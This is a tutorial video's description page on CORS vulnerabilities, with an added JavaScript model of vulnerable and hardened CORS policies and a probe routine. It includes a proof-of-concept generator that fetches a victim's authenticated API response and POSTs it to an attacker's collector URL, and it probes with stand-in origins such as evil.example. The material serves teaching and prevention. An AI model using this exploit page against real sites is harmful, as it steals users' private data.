
Cross-Origin Resource Sharing (CORS) | Complete Guide

In this video, we cover the theory behind Cross-Origin Resource Sharing (CORS) vulnerabilities, how to find these types of vulnerabilities from both a white-box and a black-box perspective, how to exploit them, and how to prevent them.
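The three parts of that agenda (the misconfiguration itself, a black-box check for it, and the exploit page) in one small model, as an added example that is not code from the video or from the Web Security Academy labs. It is plain JavaScript runnable in Node: each policy function stands in for a server's CORS decision and returns the response headers it would send, `assessCors` stands in for the probing an attacker or scanner does by varying the `Origin` request header, and the hostnames `api.example.com`, `evil.example` and the allowlist entries are constructed for the example.

```javascript
// Added example (not from the video). Hostnames and origins are constructed.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// Policy 1 (vulnerable): echo whatever Origin the browser sent and allow
// credentials. Any site the victim visits can then read their authenticated
// responses from this API.
function reflectingPolicy(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Policy 2 (vulnerable): a suffix check meant to allow subdomains of
// example.com. It also matches "https://evilexample.com", and it trusts the
// "null" origin that sandboxed iframes and data: URLs send.
function suffixPolicy(origin) {
  if (origin === "null" || (origin && origin.endsWith("example.com"))) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
    };
  }
  return {};
}

// Policy 3 (hardened): exact match against a fixed allowlist. "null" is never
// in the list, and Vary: Origin stops a shared cache from serving one
// origin's ACAO header to another.
function allowlistPolicy(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Black-box probes: the same request repeated with attacker-controlled Origin
// values that a sloppy match would accept.
function probeOrigins(targetHost) {
  return [
    "https://evil.example",                // arbitrary origin (pure reflection)
    "null",                                // sandboxed iframe / data: URL
    `https://${targetHost}.evil.example`,  // prefix match on the target host
    `https://evil${targetHost}`,           // suffix match on the target host
  ];
}

// `send(origin)` stands in for one HTTP request and returns response headers.
// A reflected ACAO with ACAC: true means a cross-origin page can read the
// victim's authenticated response; without ACAC only unauthenticated data
// leaks. ACAO "*" is not flagged: browsers refuse credentialed reads under it.
function assessCors(send, targetHost) {
  const findings = [];
  for (const origin of probeOrigins(targetHost)) {
    const h = send(origin);
    const acao = h["Access-Control-Allow-Origin"];
    const creds = h["Access-Control-Allow-Credentials"] === "true";
    if (acao === origin && creds) findings.push({ origin, severity: "high" });
    else if (acao === origin) findings.push({ origin, severity: "low" });
  }
  return findings;
}

// Exploit page hosted on one of the accepted origins. credentials: "include"
// makes the browser attach the victim's cookies; the misconfigured headers let
// the script read the body and forward it to the attacker's collector.
function buildPoc(targetUrl, collectorUrl) {
  return `<script>
fetch(${JSON.stringify(targetUrl)}, { credentials: "include" })
  .then(r => r.text())
  .then(body => fetch(${JSON.stringify(collectorUrl)}, { method: "POST", body }));
</script>`;
}

// Stand-alone run: compare the three policies against the same probes.
for (const [name, policy] of Object.entries({ reflectingPolicy, suffixPolicy, allowlistPolicy })) {
  console.log(name, assessCors(policy, "api.example.com"));
}
```

Against `api.example.com` the reflecting policy is flagged on all four probes, the suffix policy on `null` and `https://evilapi.example.com`, and the allowlist policy on none; the first two are the cases where the PoC page would succeed.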

▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: https://bit.ly/30LWAtE

▬ 📖 Contents of this video 📖 ▬▬▬▬▬▬▬▬▬▬
00:00 - Introduction
00:31 - Web Security Academy Course (https://bit.ly/30LWAtE)
01:42 - Agenda
02:30 - What is a CORS vulnerability?
33:35 - How to find CORS vulnerabilities?
42:37 - How to exploit CORS vulnerabilities?
50:25 - How to prevent CORS vulnerabilities?
51:47 - Resources
52:00 - Thank You

▬ 🔗 Links 🔗 ▬▬▬▬▬▬▬▬▬▬
Video slides: https://github.com/rkhal101/Web-Security-Academy-Series/blob/main/cors/theory/CORS%20Complete%20Guide%20Theory%20Video%20Slides.pdf
Web Security Academy: https://portswigger.net/web-security/cors
Rana's Twitter account: https://twitter.com/rana__khalil
Hacker Icons made by Freepik: https://www.freepik.com

Video "Cross-Origin Resource Sharing (CORS) | Complete Guide" from the Rana Khalil channel
Video information
Published 13 March 2022, 22:00:37
Duration 00:52:17